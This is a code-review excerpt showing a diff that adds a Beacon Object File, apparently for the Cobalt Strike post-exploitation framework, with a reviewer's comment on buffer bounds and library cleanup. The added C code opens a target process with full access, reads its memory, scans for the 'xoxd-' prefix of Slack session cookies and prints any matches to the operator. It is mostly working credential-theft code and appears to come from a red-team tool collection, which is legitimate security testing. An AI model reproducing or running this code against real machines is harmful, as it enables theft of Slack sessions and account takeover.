src/Remote/slack_cookie/entry.c

```diff
@@ -0,0 +1,208 @@
+#include <windows.h>
+#include "bofdefs.h"
+#include "base.c"
+
+//  Forward declarations:
+BOOL GetProcessList( int pid );
+void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz);
+void GetProcessMemory( HANDLE hProcess );
+
+typedef BOOL (*myReadProcessMemory)(
+    HANDLE hProcess,
+    LPCVOID lpBaseAddress,
+    LPVOID lpBuffer,
+    size_t nSize,
+    size_t *lpNumberOfBytesRead
+);
+
+typedef size_t(*myVirtualQueryEx)(
+    HANDLE hProcess,
+    LPCVOID lpAddress,
+    PMEMORY_BASIC_INFORMATION lpBuffer,
+    size_t dwLength
+);
+
+typedef struct _MEMORY_INFO 
+{
+    LPVOID offset;
+    unsigned long long size;
+    DWORD state;
+    DWORD protect;
+    DWORD type;
+} MEMORY_INFO, *PMEMORY_INFO;
+
+BOOL GetProcessList( int pid )
+{
+  HANDLE hProcess;
+  hProcess = KERNEL32$OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid);
+  if( hProcess == NULL )
+     { 
+    BeaconPrintf(CALLBACK_ERROR, "OpenProcess Failed");
+    return(FALSE);
+  } 
+
+  GetProcessMemory(hProcess);
+  KERNEL32$CloseHandle( hProcess );
+    
+  return( TRUE );
+}
+
+void Write_Memory_Range( HANDLE hProcess, LPCVOID address, size_t address_sz)
+{
+    myReadProcessMemory ptr_ReadProcessMemory = NULL;
+    BOOL rc = FALSE;
+    size_t bytesRead = 0;
+    unsigned char *buffer = NULL;
+    int index = 0;
+    int ret_sz = 1;
+
+    HMODULE KERNEL32 = LoadLibraryA("kernel32");
+    if( KERNEL32 == NULL)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Unable to load ws2 lib");
+        return;
+    }
+    ptr_ReadProcessMemory = (myReadProcessMemory)GetProcAddress(KERNEL32, "ReadProcessMemory");
+    if(!ptr_ReadProcessMemory )
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Could not load functions");
+        goto END;
+    }
+
+    buffer = intAlloc(address_sz+0x100);
+    if (buffer == NULL)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "Failed to allocate memory");
+        goto END;
+    }
+
+    rc = ptr_ReadProcessMemory( hProcess, address, (char*)buffer, address_sz, &bytesRead );
+    if (rc == 0)
+    {
+        BeaconPrintf(CALLBACK_ERROR, "\nReadProcessMemory failed\n");
+        BeaconPrintf(CALLBACK_ERROR, "Bytes Read %d\n", bytesRead);
+        BeaconPrintf(CALLBACK_ERROR, "\n\n\n %s\n\n\n", buffer );
+        return;
+    }
+
+    //for (index = 0; index < (address_sz/2)-8; index++)
+    for (index = 0; index < address_sz-5; index++)
+    {
+        // search for xoxd- [78 6f 78 64 2d] 
+        if (buffer[index] == 0x78 && buffer[index + 1] == 0x6f && buffer[index + 2] == 0x78 && buffer[index + 3] == 0x64 && buffer[index + 4] == 0x2d)
+        {
+            BeaconPrintf(CALLBACK_OUTPUT, "Slack Cookie: %s", buffer + index);
+            index += MSVCRT$strlen((char *)(buffer + index)) - 1;
```

Comment:
if you could flip this out to an strnlen using the remainder of the buffer to be examined as the size I'll happily accept this.

The LoadLibrary calls should also have a matching FreeLibrary call.  Msg should call out unable to load kernel32, granted if this bof started running kernel32 should already be loaded in.